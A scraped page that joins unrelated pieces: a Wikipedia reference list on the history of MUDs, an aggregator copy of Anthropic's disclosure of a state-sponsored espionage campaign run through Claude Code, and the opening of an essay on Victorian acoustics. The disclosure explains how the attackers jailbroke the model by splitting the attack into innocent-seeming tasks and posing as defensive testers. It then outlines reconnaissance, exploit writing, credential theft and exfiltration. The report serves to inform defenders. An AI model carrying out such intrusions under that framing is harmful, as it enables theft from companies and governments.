  7. ^ Schaefer, Dominik; Mardare, Cezarina; Savan, Alan; Sanchez, Miguel D.; Mei, Bastian; Xia, Wei; Muhler, Martin; Ludwig, Alfred; Schuhmann, Wolfgang (February 17, 2011). "High-Throughput Characterization of Pt Supported on Thin Film Oxide Material Libraries Applied in the Oxygen Reduction Reaction". Analytical Chemistry . 83 (6): 1916– 1923. doi : 10.1021/ac102303u . hdl : 11336/105712 . PMID 21329337 . Programs in LPC programming language were developed to perform the following tasks: First, each set of CVs was separated into single CVs, and each of them were plotted. An average CV from all the CVs in one set was calculated and plotted as well. All images belonging to one set of CVs were combined into short animated movies to visualize the changes over time. The graphs of the averaged CVs from all measurement points within a line scan were combined into an animation for demonstrating the systematic changes along each of the Pt stripes. After that, specific parameters were extracted from each CV (see below). These parameters and some derived values were tabulated and plotted versus the x-coordinate of the measurement point. Thus, different graphs for each line scan were created showing the changes in specific properties along the thickness of the Pt stripe. The combined tabulated data for each wafer was then used to plot a 3D image of several parameters vs substrate composition and nominal thickness. The LPC programs were compiled using LDMud (V3.3.719).
  8. ^ a b Turkle, Sherry (September 4, 1997). Life on the Screen: Identity in the Age of the Internet (pbk. ed.). Simon & Schuster . ISBN 978-0-684-83348-4 .
  9. ^ Grimmelmann, James (December 8, 2004). "Virtual Worlds as Comparative Law" (PDF) . New York Law School Law Review (49): 147– 184. Archived from the original (PDF) on June 19, 2010 . Retrieved May 6, 2010 .
  10. ^ a b Castronova, Edward (2006). Synthetic Worlds: The Business and Culture of Online Games . University Of Chicago Press. pp. 10, 291 . ISBN 978-0-226-09627-8 . [pp. 10] The ancestors of MMORPGS were text-based multiuser domains (MUDs) [...] [pp. 291] Indeed, MUDs generate perhaps the one historical connection between game-based VR and the traditional program [...]
  11. ^ Shefski, William J. (1995). Interactive Internet: The Insider's Guide to MUDs, MOOs, and IRC . Prima Publishing . pp. 41 . ISBN 978-1-55958-748-8 .
  12. ^ Stuart, Keith (July 19, 2007). "MUD, PLATO and the dawn of MMORPGs" . The Guardian . London. The thing is, though, that even if the likes of Oubliette did count as a virtual world, they had pretty well zero effect on the development of today's virtual worlds. Follow the audit trail back from World of Warcraft, and you wind up at MUD.
  13. ^ Taylor, T.L. (February 24, 2006). Play Between Worlds: Exploring Online Game Culture . The MIT Press. pp. 24 . ISBN 978-0262201636 .
  14. ^ a b Nelson, Mike (July 2, 2002). "Interview: Brad McQuaid" . The guru of 3D . Archived from the original on March 10, 2007 . Retrieved March 3, 2007 .
  15. ^ Carter, Randolph (April 23, 2009). "Psychochild" . Grinding to Valhalla . Retrieved April 19, 2010 . The MUDs I played extensively: Genocide (where I first used the name "Psychochild"), Highlands, Farside, Kerovnia, and Astaria.
  16. ^ Montfort, Nick (2003). Twisty Little Passages: An Approach to Interactive Fiction . MIT Press . ISBN 978-3-540-63293-1 .
  17. ^ Stewart, William. "Summary MUD History" . Living Internet . Archived from the original on July 25, 2008 . Retrieved July 10, 2008 . Containing many of the features of a D&D game, it added an interesting twist -- the dungeon master, the person who set-up and ran a D&D world, was played by the Adventure computer program itself.
  18. ^ Brian Dear, Chapter 16: "Into the Dungeon", The Friendly Orange Glow , Pantheon Books, New York, 2017; see pages 292–294 for "pedit5", pages 294–297 for "dnd", pages 297–298 for "dungeon".
  19. ^ Anderson, Tim ; Galley, Stu . "The History of Zork" . Archived from the original on January 16, 2009. Zork was too much of a nonsense word, not descriptive of the game, etc., etc., etc. Silly as it sounds, we eventually started calling it Dungeon. (Dave admits to suggesting the new name, but that's only a minor sin.) When Bob the lunatic released his FORTRAN version to the DEC users' group, that was the name he used.
  20. ^ Kelly, Kevin ; Rheingold, Howard (1993). "The Dragon Ate My Homework" . Wired . Vol. 1, no. 3. Archived from the original on October 25, 2012 . Retrieved March 8, 2017 . In 1980, Roy Traubshaw, a British fan of the fantasy role-playing board game Dungeons and Dragons, wrote an electronic version of that game during his final undergraduate year at Essex College. The following year, his classmate Richard Bartle took over the game, expanding the number of potential players and their options for action. He called the game MUD (for Multi-User Dungeons), and put it onto the Internet.
  21. ^ Bartle, Richard (1990). "Early MUD History" . Archived from the original on March 24, 2023 . Retrieved August 7, 2008 . The program was also becoming unmanageable, as it was written in assembler. Hence, he rewrote everything in BCPL, starting late 1979 and working up to about Easter 1980. The finished product was the heart of the system which many people came to believe was the "original" MUD. In fact, it was version 3.
  22. ^ Shah & Romine 1995 , p. 7, "The acknowledged original game known as 'MUD' was developed in 1978 for the old DEC-10 mainframe system at Essex University by Roy Trubshaw and Richard Bartle."
  23. ^ Cuciz, D. (2004). "The History of MUDs" . GameSpy.com. Archived from the original on March 24, 2008 . Retrieved April 19, 2009 .
  24. ^ Wisner, Bill (June 29, 1990). "A brief history of MUDs" . alt.mud . Archived from the original on April 24, 2010 . Retrieved January 8, 2009 . The point of the game was to gain points until you achieved the rank of wizard, at which point you became immortal and gained certain powers over mortals. Points were scored by killing things or dropping treasure into a swamp. The game gained some popularity in Britain when a guest account was set up that allowed users on JANET (the British academic network) to play during the small hours of the morning each day.
  25. ^ Hosch, William L.; Ray, Michael (May 9, 2023). "Online gaming" . Encyclopedia Britannica . Retrieved May 19, 2023 .
  26. ^ Mulligan, Jessica; Patrovsky, Bridgette (2003). Developing Online Games: An Insider's Guide . New Riders. pp. 444 . ISBN 978-1-59273-000-1 . 1980 [...] Final version of MUD1 completed by Richard Bartle. Essex goes on the ARPANet, resulting in Internet MUDs!
  27. ^ Bartle, Richard . "Incarnations of MUD" . This is the "classic" MUD, played by many people both internal and external to the University. Although eventually available only during night-time due to the effects of its popularity on the system, its impact on on-line gaming has been immense. I eventually closed it down on 30/9/87 upon leaving Essex University to work for MUSE full time.
  28. ^ Lawrie, Michael (2003). "Escape from the Dungeon" . October of 1987 was chaos. The MUD account was deleted, but the guest account on Essex University remained open. I guess it wasn't causing any trouble so they simply left it. ROCK, UNI and MUD all ran from the MUD account so they had gone but... MIST ran from a student account and it was still playable.
  29. ^ Bartle, Richard (1990). "Interactive Multi-User Computer Games" . Archived from the original on February 2, 2016. Although the present system went live in October 1988, Gods began in 1985 as a non-commercial MUA; its author was inspired by MUD1 to write his own game, and was among the first people to do so. Gods was Shades' only rival to be the Prestel Micronet MUA.
  30. ^ Bartle, Richard (1990). "Interactive Multi-User Computer Games" . Archived from the original on February 2, 2016. Pip Cordrey used to run a BBS called 'Labbs', which had a section devoted to MUD1 in its early days. Six people from St. Paul's School worked on that section, and Cordrey organised them into a team to develop a MUA that would run on a home computer. The system was named MirrorWorld because it had rolling resets (as in the film "Westworld"). It went live in 1986.
  31. ^ Kate & Frobozz (1986). "Micronet's Multi-user Game" . Commodore Computing International . Archived from the original on April 30, 2009 . Retrieved January 8, 2009 . Written by Neil Newell, originally as a hobby because he enjoyed playing- the original MUD so much on Essex University, SHADES has recently. been launched on Micronet, the computer network, which has a large Commodore user-base.
  32. ^ Sinha, Indra (1999). The Cybergypsies: a True Tale of Lust, War, and Betrayal on the Electronic Frontier . Viking Press . ISBN 978-0-670-88630-2 .
  33. ^ Bartle, Richard (1990). "Interactive Multi-User Computer Games" . Archived from the original on February 2, 2016. The Multi-User Galaxy Game project was begun in 1985 by CompuNet as a SF alternative to MUD1, which then ran on the system. When the other programmer left CompuNet, Lenton rewrote the game from scratch as Federation II . It was officially launched on CompuNet in 1989; reported also to run on MicroLink, and on any other commercial system willing to take it.
  34. ^ Wisner, Bill (June 29, 1990). "A brief (and very incomplete) history of MUDs" . alt.mud . Archived from the original on November 9, 2012 . Retrieved August 7, 2008 . Milieu was originally written for a CDC Cyber owned by the Minnesota Educational Computer Consortium. High school students from around the state were given access to the machine for educational purposes; they often ended up writing chat programs and games instead. I am uncertain of the precise time frame, but I believe Milieu probably predates MUD.
  35. ^ Bartle, Richard (2016). MMOs from the Inside Out . Apress. p. 31. ISBN 978-1-4842-1724-5 . in 1983, Klietz formed a company, GāmBit, with Bob Alberti and two others to commercialize Sceptre.
  36. ^ Klietz, Alan (January 20, 1992). "Scepter - the first MUD?" . Archived from the original on December 7, 2008 . Retrieved April 26, 2010 . As micros became cost effective, the MECC mainframe became obsolete and was shut down in 1983. Scepter then went commercial in a collaboration between several ex-MECC (and by then also post-highschool) game hackers. It was rewritten in C and ran on a PC XT running QNX. It supported 16 dialup users, and dialup installations were set up in 5 states and Canada. This exposed Scepter to a lot of budding MUD developers at a time when the Internet was just getting started.
  37. ^ Bartle 2003 , p. 13, "Around the same time that Roy Trubshaw began work on what was to become MUD1, Alan Klietz wrote Sceptre of Goth on the CDC Cyber run by MECC (the Minnesota Educational Computer Consortium)."
  38. ^ Hyrup, Darrin (February 10, 2007). "The Future of Dragon's Gate" . Archived from the original on July 18, 2011 . Retrieved April 26, 2010 . So after more than 15 years of great memories, with a heavy heart, I am going to officially declare Dragon's Gate closed... at least for now.
  39. ^ Mulligan, Jessica; Patrovsky, Bridgette (2003). Developing Online Games: An Insider's Guide . New Riders. pp. 447 , 463. ISBN 978-1-59273-000-1 . 1985 [...] "My memory says that Island of Kesmai went live on CompuServe on December 15, 1985, after a very long internal test. The price was actually $6 an hour for 300 baud, $12 for 1200 baud. Serious players paid the bucks." Kelton Flinn [...] 2000 [...] In May, Electronics Arts announces the shutdown of most of the Kesmai games, including Legends of Kesmai and Air Warrior Classic.
  40. ^ "A Study of MUDs as a Society" . 1998. Some would insist however that 'MUD' does in fact stand for Multi Undergraduate Destroyer, in recognition of the number of students who may have failed their classes due to too much time spent MUDding!
  41. ^ Bartle, Richard. "Richard A. Bartle: Reviews - UK" . Archived from the original on December 28, 2015 . Retrieved June 7, 2015 . When you leave the game, objects can be kept for when you restart (eg. that weapon you commissioned from a smith), and you restart in the room from which you quit. This means some objects can be kept unavailable for long periods if their owner isn't playing. There are no resets.
  42. ^ Bartle, Richard. "Reviews – UK" . www.mud.co.uk . Archived from the original on December 28, 2015 . Retrieved June 7, 2015 . Experience is obtained by visiting new places, wandering around exploring, and even by simply chatting. This contrasts with the usual MUA scheme where points are obtained for finding treasure or performing specific tasks.
  43. ^ Bartle, Richard. "Reviews – UK" . www.mud.co.uk . Archived from the original on December 28, 2015 . Retrieved June 7, 2015 . Almost anything can be bought, including houses, shops, taverns, animals, weapons, food and drink. Personae may use certain skills to create objects, eg. potions, which can be sold to other players for use on their adventures.
  44. ^ Carroll, Eddy. "5. Reviews -- Rest of the World" . Archived from the original on April 23, 2010 . Retrieved September 25, 2002 . Cox was a player of MUD1 who wrote AberMUD while a student at the University of Wales, Aberystwyth.
  45. ^ Bartle 2003 , p. 741, "AberMUD spread across university computer science departments like a virus. Identical copies (or incarnations) appeared on thousands of Unix machines. It went through four versions in rapid succession, spawning several imitators. The three most important of these were TinyMUD, LPMUD, and DikuMUD."
  46. ^ Skrenta, Richard (November 30, 1988). "monster - multiuser adventure game for VMS" . comp.sources.games . Retrieved April 26, 2010 . Monster was written in VMS Pascal under VMS 4.6.
  47. ^ Skrenta, Richard (January 20, 2002). "VMS Monster" . Skrentablog . Archived from the original on February 2, 2006 . Retrieved November 1, 2010 .
  48. ^ Skrenta, Richard (January 13, 1997). "An Introduction to Monster" . Retrieved April 26, 2010 . Monster allows players to do something that very few, if any, other games allow: the players themselves create the fantasy world as part of the game. Players can create objects, make locations, and set up puzzles for other players to solve.
  49. ^ Aspnes, James (July 4, 1990). "Monster" . alt.mud . TinyMUD 1.0 was initially designed as a portable, stripped-down version of Monster (this was back in the days when TinyMUD was designed to be up and running in a week of coding and last for a month before everybody got bored of it.)
  50. ^ Burka, Lauren P. (1995). "The MUDline" . Archived from the original on January 2, 2005 . Retrieved April 26, 2010 . August 19, 1989. Jim Aspnes announces the availability of TinyMUD to a few friends. Its port, 4201, is Aspnes' office number. TinyMUD is written in C for Unix, and was originally conceived as a front-end for IRC.
  51. ^ "toccobrator.com: TinyMUD Classic" .
  52. ^ Bartle, Richard. "Adventure 89 review Pip Cordrey" .
  53. ^ Mulligan, Jessica; Patrovsky, Bridgette (2003). Developing Online Games: An Insider's Guide . New Riders. pp. 451 . ISBN 978-1-59273-000-1 . 1989 [...] Lars Penjske creates LPMud and opens Genesis . "Having fun playing TinyMUD and AberMUD , Lars Penjske decides to write a server to combine the extensibility of TinyMUD with the adventures of AberMUD . Out of this inspiration, he designed LPC as a special MUD language to make extending the game simple. Lars says, '...I didn't think I would be able to design a good adventure. By allowing wizards coding rights, I thought others could help me with this.' The first running code was developed in a week on Unix System V using IPC, not BSD sockets. Early object-oriented features only existed accidentally by way of the nature of MUDs manipulating objects. As Lars learned C++, he gradually extended those features. The result is that the whole LPMud was developed from a small prototype, gradually extended with features." — George Reese's LPMud Timeline
  54. ^ Stewart, William (2002). "MUD History" . The original LPMUD was written by Lars Pensjö and others, and became one of the most popular MUD's by the early 1990s.
  55. ^ Smedley, John ; McQuaid, Brad (March 17, 2000). "Sworn Statement" . DIKU MUD. Archived from the original on April 13, 2011 . Retrieved April 26, 2010 .
  56. ^ McQuaid, Brad ; Clover, Steve; Uzun, Roger (March 17, 2000). "Sworn Statement" . DIKU MUD. Archived from the original on April 13, 2011 . Retrieved April 26, 2010 .
  57. ^ Cambron, Melanie (2002). "A chat with Elonka Dunin" . Archived from the original on September 27, 2007. Simutronics was originally the brain-child of David Whatley. As a teenager, he'd been big into the old BBS days and had even written some Fantasy Game BBS software that he sold all over the world, and he did this all from his parents' home. He'd also gotten involved as a player in some of the early multiplayer games that were out there such as Sceptre and Island of Kesmai, and, like many others who play these games, he thought to himself, "I can do this too." So in 1987, at the age of 21, he founded Simutronics Corporation with Tom and Susan Zelinski.
  58. ^ Dunin, Elonka (2008). "Simutronics Timeline" . Archived from the original on October 7, 2008 . Retrieved January 15, 2009 . December, 1996 - GemStone III and DragonRealms are the top two titles (hours/month) in industry
  59. ^ Basic movement commands: The Lands of Evermore Manual Archived 2013-04-20 at the Wayback Machine
  60. ^ Levine, John R. (1997). More Internet for Dummies . IDG Books. p. 199. ISBN 0-7645-0135-6 . A better way to connect to a MUD is by using a MUD client program: a program specifically designed for MUDding. A MUD program is really a telnet program that has had various MUD-related commands added.
  61. ^ Shah & Romine 1995 , p. 257, "Features include regular expression hilites and gags, auto-login, macros, line editing, screen mode, triggers, cyberportals, logging, file and command uploading, shells, and multiple connects."
  62. ^ Busey 1995 , p. 200, "The TinyFugue system has long been a popular client interface for players of MOO, MUCK, and many TinyMUD-derivative systems. With a robust feature list supporting multiple sessions, macros, triggers and automation, command history and other functions, TinyFugue offers users maximum control over their environment. Although more recent programs such as Tintin++ have gained large followings, many MUD players continue to use TinyFugue because of its power and flexibility in the hands of an experience client programmer."
  63. ^ Cheong 1996 , p. 256 .
  64. ^ Bartle 2003 , p. 481.
  65. ^ Reese, George (March 11, 1996). "LPMud Timeline" . Archived from the original on February 26, 2012 . Retrieved April 14, 2010 . January 1992 ¶ _Genocide_ starts as the first MUD dedicated totally to inter-player conflict, which is a fancy way of saying that its theme is creatively player-killing.
  66. ^ Shah & Romine 1995 , pp. 98–99, "Some Muds are completely dependant on player-killing, and have wars that start every half-hour or so. These Muds are becoming more common, basing a lot of their ideas on the extremely popular LPmud known as Genocide."
  67. ^ Korchmar, Simon (2007). Erlösmodelle in Massively Multiplayer online Games [ Revenue Models in Massively Multiplayer online Games ] (in German). GRIN Verlag . p. 10. ISBN 978-3-640-22276-6 . Unzählige MUD-Nachfolger (wie etwa MOO, MUSH, MUCK, etc.) verwendeten ähnliche Systeme und Thematiken — v. A. aus Fantasy und Science Fiction — und verstärkten teilweise den Rollenspiel-Charakter bis hin zu den 'sogennanten Role Play Intensive MUD (RPIMUD)'. ["Countless MUD successors (such as MOO, MUSH, MUCK, etc.) used similar systems and themes from fantasy and science fiction, and increased degrees of role-playing focus up to the so-called 'Role Play Intensive MUD (RPIMUD)'"]
  68. ^ Burka, Lauren P. (1995). "The MUD Timeline" . Archived from the original on January 2, 2005 . Retrieved April 22, 2010 . Summer 1991. koosh (Nils McCarty) ports MicroMush to Chezmoto. The name is changed to MicroMuse at the suggestion of Wallace Feurzeig of BBN. MicroMuse evolves into the first educational Mud, with emphasis on K12 outreach.
  69. ^ "MicroMUSE Charter" . MuseNet. 1994. Archived from the original on June 15, 2011 . Retrieved April 22, 2010 .
  70. ^ Bartle 2003 , p. 3, "Confusingly, although the term MUD applies to virtual worlds in general, the term MU* does not—it's used strictly for text-based worlds. The introduction of computer graphics into the mix therefore caused a second spate of naming, in order to make a distinction between graphical MUDs and text MUDs ."
  71. ^ Castronova, Edward (2006). Synthetic Worlds: The Business and Culture of Online Games . University Of Chicago Press. pp. 291 . ISBN 978-0-226-09627-8 . [...] established Habitat as a result. This is described as a 2D graphical MUD, and while we now know that Habitat was the first of many massively multiuser graphical chat spaces, we also know that the connection is not direct. [...] Its owners and makers (particularly F. Randy Farmer and Chip Morningstar) [...]
  72. ^ Damer, Bruce (1998). Avatars!: exploring and building virtual worlds on the Internet . Peachpit Press. pp. 383–384 . ISBN 978-0-201-68840-5 . Some people describe it as a MUD (Multi User Dungeon) with a 3D interface and role playing character.
  73. ^ Aihoshi, Richard (September 27, 2000). "Brad McQuaid Interview" . RPG Vault. Archived from the original on May 24, 2007. Then, in 1996, I was hired by Sony Interactive Studios to create a graphical, commercial MUD.
  74. ^ Firor, Matt (2003). "Post-Mortem: Mythic's Dark Age of Camelot ". In Mulligan, Jessica; Patrovsky, Bridgette (eds.). Developing Online Games: An Insider's Guide . New Riders. pp. 340 . ISBN 978-1-59273-000-1 . It made perfect sense for us to combine the two technologies and make a graphical MUD.
  75. ^ King, Brad (July 15, 2002). "Games Started Off Without a Bang" . Wired News . Retrieved September 9, 2010 .
  76. ^ Dobson, James (May 3, 2007). "Q&A: Behind RuneScape's 1 Million Subscriber Success" . Gamasutra . Archived from the original on May 6, 2010 . Retrieved April 24, 2010 . When I went to university, I discovered text-based MUDs, or multi-user dungeons. I loved the fact that these sorts of games had all these players playing at once - even when you were not playing, the world carried on without you. Because of this, I began creating my own text-based MUD, but I quickly realized that with so many of them out there, there was no way that mine would ever get noticed. So I began to search for a way to make mine stand out, and the obvious way, of course, was to add graphics. With my game, I was trying to emulate text MUDs at the time, purely as a hobby.
  77. ^ Funk, John (July 23, 2008). "WarCry and Jagex Talk RuneScape" . WarCry Network. Archived from the original on July 28, 2011 . Retrieved January 6, 2009 . Olifiers began with a brief history of Jagex and RuneScape: how Lead Developer Andrew Gower and his brother Paul founded the company in Cambridge in 2001, bringing their love for classic MUDs into the visual realm. The original RuneScape (now referred to as RuneScape Classic) was simply and exactly that: a 2D graphical interface placed on top of a MUD
  78. ^ Safko, Ron; Brake, David (2009). The Social Media Bible: Tactics, Tools, and Strategies for Business Success . Wiley. ISBN 978-0-470-41155-1 . Richard Garriott first coined the term MMORPG in 1997.
  79. ^ Bartle 2003 , p. 43, "Above this layer is what (for historical reasons) is known as the mudlib 58 . [...] 58 For "mud library". MUD1 had a mudlib, but it was an adaptation of the BCPL input/output library and therefore was at a lower level than today's mudlibs. The modern usage of the term was coined independently by LPMUD ."
  80. ^ Busey 1995 , p. 239, " MUDLib is short for MUD library . ... Files within a MUDLib are akin to books on the shelves of a library."
  81. ^ Bartle 2003 , p. 43, "The mudlib defines the physics of a virtual world, which will include things such as mass/weight, timers, movement and communication, along with higher concepts such as (in a game context) magic and combat mechanisms."
  82. ^ Reese, George (March 11, 1996). "LPMud Timeline" . Archived from the original on February 26, 2012 . Retrieved April 18, 2010 . Late 1991 ¶ After the retirement of Lars from _Genesis_, the _Genesis_ admins move to create the first LPMud-derived server, CD. CD stands for Chalmers Datorforening, Swedish for Chalmers Computing Club, where _Genesis_ and _Igor_ existed. In spite of his retirement from _Genesis_, Lars continued to develop LPMud.ad
  83. ^ "Full Lima Bundle Released" . lpmuds.net . January 24, 2009. Archived from the original on March 12, 2016 . Retrieved May 17, 2010 .
  84. ^ a b Brennan, Seraphina (January 6, 2009). "MUD history dissolving into the waters of time" . Massively . Archived from the original on April 26, 2016 . Retrieved March 8, 2016 .
  85. ^ Towers, J. Tarin; Badertscher, Ken; Cunningham, Wayne; Buskirk, Laura (1996). Yahoo! Wild Web Rides . IDG Books Worldwide Inc. p. 138. ISBN 978-0-7645-7003-2 . The MUD Connector at http://www.mudconnect.com has just about everything you could possibly need to get on a MUD. It has MUD-related links to FAQs, newsgroups and clients; as well as player discussions and forums about different MUDs. This site also has a listing of over 500 MUDs, with pretty useful descriptions of what you can expect to find on most games. You can even click on the MUD or home page you'd like to see and link right to it. If you're shopping for a new MUD and aren't sure what you're looking for, this is the place to park it. We're talking big time bookmark material here.
  86. ^ Pantuso, Joe (1996). The Complete Internet Gamer . John Wiley & Sons . p. 115. ISBN 978-0471137870 . The Mud Connector has, at the time of this writing, links to 205 active Muds. The Muds are reviewed periodically, so there are few dead links. What sets this site apart from some of the other Mud link connections listed here is that each link includes the name of the Mud, the kind of code it is based on (nice for developers), the telnet address written out, an active hyperlink to the telnet site and Web home page if one exists, and a short but useful description of the Mud. The list is alphabetized and broken into four sections for easy loading. There are also forms for submitting your Mud to the list. There is even a page for dead links in case you want to see what has gone before.
  87. ^ Condon, William; Butler, Wayne (1997). Writing the Information Superhighway . Longman. pp. 306 . ISBN 978-0205195756 . "The Mud Connector" is a complete on-line service designed to provide the most up-to-date listings of registered Multiuser on-line games. Every entry lists the site of the game, the base code used, descriptions of the game as submitted by the administrators, links to WWW homepages (when available), and Telnet links to the game.
  88. ^ Godlovitch, Ilsa (August 28, 1995). "Jackal takes Dragonfly to be his bride" . The Independent . Retrieved May 2, 2016 .
  89. ^ Bartle, Richard (July 1997). Jacobson, David (ed.). "Hearts, Clubs, Diamonds, Spades: Players Who Suit MUDs" . Journal of Virtual Environments . 1 (1). Archived from the original on October 29, 2007 . Retrieved April 30, 2010 .
  90. ^ Stuart, Keith (July 17, 2007). "MUD, PLATO and the dawn of MMORPGs" . guardian.co.uk . London. Archived from the original on July 6, 2008 . Retrieved July 8, 2008 .
  91. ^ Towell, John; Towell, Elizabeth (1997). "Presence in Text-Based Networked Virtual Environments or "MUDS" " . Presence . 6 (5): 590– 595. doi : 10.1162/pres.1997.6.5.590 . S2CID 46020475 . Archived from the original on May 18, 2013 . Retrieved May 2, 2010 .
  92. ^ Hahn, Harley (1996). The Internet Complete Reference (2nd ed.). Osborne McGraw-Hill. pp. 553 . ISBN 978-0-07-882138-7 . The word "mud" is also used as a verb. For example, you might hear someone say, "I like to mud more than I like to sleep," or "I am a bit tired, as I was up all night mudding, so maybe you better go to class without me".
  93. ^ Ito, Mizuko (1997). "Virtually Embodied: The Reality of Fantasy in a Multi-User Dungeon". In Porter, David (ed.). Internet Culture (pbk. ed.). Routledge. p. 93. ISBN 978-0-415-91684-4 . Often MUD users (or MUDders, as they call themselves) [...]
  94. ^ Chester, Chris (May 5, 2008). "Curing mudflation before it starts" . Engadget . Archived from the original on November 27, 2019 . Retrieved November 27, 2019 .

Source code repositories

[ edit ]

Nation state threat actor used Claude Code to orchestrate cyber attacks

Lobsters
www.anthropic.com
2025-11-14 06:54:12
Comments...
Original Article

We recently argued that an inflection point had been reached in cybersecurity: a point at which AI models had become genuinely useful for cybersecurity operations, both for good and for ill. This was based on systematic evaluations showing cyber capabilities doubling in six months; we’d also been tracking real-world cyberattacks, observing how malicious actors were using AI capabilities. While we predicted these capabilities would continue to evolve, what has stood out to us is how quickly they have done so at scale.

In mid-September 2025, we detected suspicious activity that later investigation determined to be a highly sophisticated espionage campaign. The attackers used AI’s “agentic” capabilities to an unprecedented degree—using AI not just as an advisor, but to execute the cyberattacks themselves.

The threat actor—whom we assess with high confidence was a Chinese state-sponsored group—manipulated our Claude Code tool into attempting infiltration into roughly thirty global targets and succeeded in a small number of cases. The operation targeted large tech companies, financial institutions, chemical manufacturing companies, and government agencies. We believe this is the first documented case of a large-scale cyberattack executed without substantial human intervention.

Upon detecting this activity, we immediately launched an investigation to understand its scope and nature. Over the following ten days, as we mapped the severity and full extent of the operation, we banned accounts as they were identified, notified affected entities as appropriate, and coordinated with authorities as we gathered actionable intelligence.

This campaign has substantial implications for cybersecurity in the age of AI “agents”—systems that can be run autonomously for long periods of time and that complete complex tasks largely independent of human intervention. Agents are valuable for everyday work and productivity—but in the wrong hands, they can substantially increase the viability of large-scale cyberattacks.

These attacks are likely to only grow in their effectiveness. To keep pace with this rapidly-advancing threat, we’ve expanded our detection capabilities and developed better classifiers to flag malicious activity. We’re continually working on new methods of investigating and detecting large-scale, distributed attacks like this one.

In the meantime, we’re sharing this case publicly, to help those in industry, government, and the wider research community strengthen their own cyber defenses. We’ll continue to release reports like this regularly, and be transparent about the threats we find.

Read the full report .

How the cyberattack worked

The attack relied on several features of AI models that did not exist, or were in much more nascent form, just a year ago:

  1. Intelligence. Models’ general levels of capability have increased to the point that they can follow complex instructions and understand context in ways that make very sophisticated tasks possible. Not only that, but several of their well-developed specific skills—in particular, software coding—lend themselves to being used in cyberattacks.
  2. Agency . Models can act as agents—that is, they can run in loops where they take autonomous actions, chain together tasks, and make decisions with only minimal, occasional human input.
  3. Tools . Models have access to a wide array of software tools (often via the open standard Model Context Protocol ). They can now search the web, retrieve data, and perform many other actions that were previously the sole domain of human operators. In the case of cyberattacks, the tools might include password crackers, network scanners, and other security-related software.

The diagram below shows the different phases of the attack, each of which required all three of the above developments:

The lifecycle of the cyberattack, showing the move from human-led targeting to largely AI-driven attacks using various tools (often via the Model Context Protocol; MCP). At various points during the attack, the AI returns to its human operator for review and further direction.

In Phase 1, the human operators chose the relevant targets (for example, the company or government agency to be infiltrated). They then developed an attack framework—a system built to autonomously compromise a chosen target with little human involvement. This framework used Claude Code as an automated tool to carry out cyber operations.

At this point they had to convince Claude—which is extensively trained to avoid harmful behaviors—to engage in the attack. They did so by jailbreaking it, effectively tricking it to bypass its guardrails. They broke down their attacks into small, seemingly innocent tasks that Claude would execute without being provided the full context of their malicious purpose. They also told Claude that it was an employee of a legitimate cybersecurity firm, and was being used in defensive testing.

The attackers then initiated the second phase of the attack, which involved Claude Code inspecting the target organization’s systems and infrastructure and spotting the highest-value databases. Claude was able to perform this reconnaissance in a fraction of the time it would’ve taken a team of human hackers. It then reported back to the human operators with a summary of its findings.

In the next phases of the attack, Claude identified and tested security vulnerabilities in the target organizations’ systems by researching and writing its own exploit code. Having done so, the framework was able to use Claude to harvest credentials (usernames and passwords) that allowed it further access and then extract a large amount of private data, which it categorized according to its intelligence value. The highest-privilege accounts were identified, backdoors were created, and data were exfiltrated with minimal human supervision.

In a final phase, the attackers had Claude produce comprehensive documentation of the attack, creating helpful files of the stolen credentials and the systems analyzed, which would assist the framework in planning the next stage of the threat actor’s cyber operations.

Overall, the threat actor was able to use AI to perform 80-90% of the campaign, with human intervention required only sporadically (perhaps 4-6 critical decision points per hacking campaign). The sheer amount of work performed by the AI would have taken vast amounts of time for a human team. At the peak of its attack, the AI made thousands of requests, often multiple per second—an attack speed that would have been, for human hackers, simply impossible to match.

Claude didn’t always work perfectly. It occasionally hallucinated credentials or claimed to have extracted secret information that was in fact publicly-available. This remains an obstacle to fully autonomous cyberattacks.

Cybersecurity implications

The barriers to performing sophisticated cyberattacks have dropped substantially—and we predict that they’ll continue to do so. With the correct setup, threat actors can now use agentic AI systems for extended periods to do the work of entire teams of experienced hackers: analyzing target systems, producing exploit code, and scanning vast datasets of stolen information more efficiently than any human operator. Less experienced and resourced groups can now potentially perform large-scale attacks of this nature.

This attack is an escalation even on the “vibe hacking” findings we reported this summer : in those operations, humans were very much still in the loop, directing the operations. Here, human involvement was much less frequent, despite the larger scale of the attack. And although we only have visibility into Claude usage, this case study probably reflects consistent patterns of behavior across frontier AI models and demonstrates how threat actors are adapting their operations to exploit today’s most advanced AI capabilities.

This raises an important question: if AI models can be misused for cyberattacks at this scale, why continue to develop and release them? The answer is that the very abilities that allow Claude to be used in these attacks also make it crucial for cyber defense. When sophisticated cyberattacks inevitably occur, our goal is for Claude—into which we’ve built strong safeguards—to assist cybersecurity professionals to detect, disrupt, and prepare for future versions of the attack. Indeed, our Threat Intelligence team used Claude extensively in analyzing the enormous amounts of data generated during this very investigation.

A fundamental change has occurred in cybersecurity. We advise security teams to experiment with applying AI for defense in areas like Security Operations Center automation, threat detection, vulnerability assessment, and incident response. We also advise developers to continue to invest in safeguards across their AI platforms, to prevent adversarial misuse. The techniques described above will doubtless be used by many more attackers—which makes industry threat sharing, improved detection methods, and stronger safety controls all the more critical.

Read the full report .

Edited November 14 2025:

  • Added an additional hyperlink to the full report in the initial section
  • Corrected an error about the speed of the attack: not "thousands of requests per second" but "thousands of requests, often multiple per second"

Hooked on Sonics: Experimenting with Sound in 19th-Century Popular Science

Hacker News
publicdomainreview.org
2025-11-14 06:13:09
Comments...
Original Article

Of all the senses cultivated throughout the 19th century, it was the sense of hearing that experienced the most dramatic transformation, as the science of sound underwent rapid advancement. Lucas Thompson delves into a particular genre of popular acoustics primers aimed at children and amateurs alike, which reveal the pedagogical, ludic, and transcendental strivings of Victorian society.

Published

October 23, 2025

Engraving showing a boy in formal attire blowing a trumpet attached to an experimental apparatus consisting of two circular disks of different sizes mounted on a wooden stand. Scroll through the whole page to download all images before printing.

An experiment demonstrating the reflection of sonic vibrations, from Alfred Marshall Mayer’s Sound: A Series of Simple, Entertaining, and Inexpensive Experiments in the Phenomena of Sound (1879) — Source .

In 1777, the German physicist Ernst Chladni, who would later be crowned the Father of Acoustics, designed an experiment that revolutionized our understanding of sound. After placing grains of sand on a thin metal plate and drawing a violin bow along one edge, Chladni watched in wonder as the sand danced and jiggled into surprising shapes — all perfectly even and symmetrical, but changing their formations depending on how the bow was used. In their beauty and complexity, these shapes (which the physicist himself cannily called “Chladni figures”) seemed to be arranged by invisible hands. In one simple and elegant experiment, sound had become visible. 1

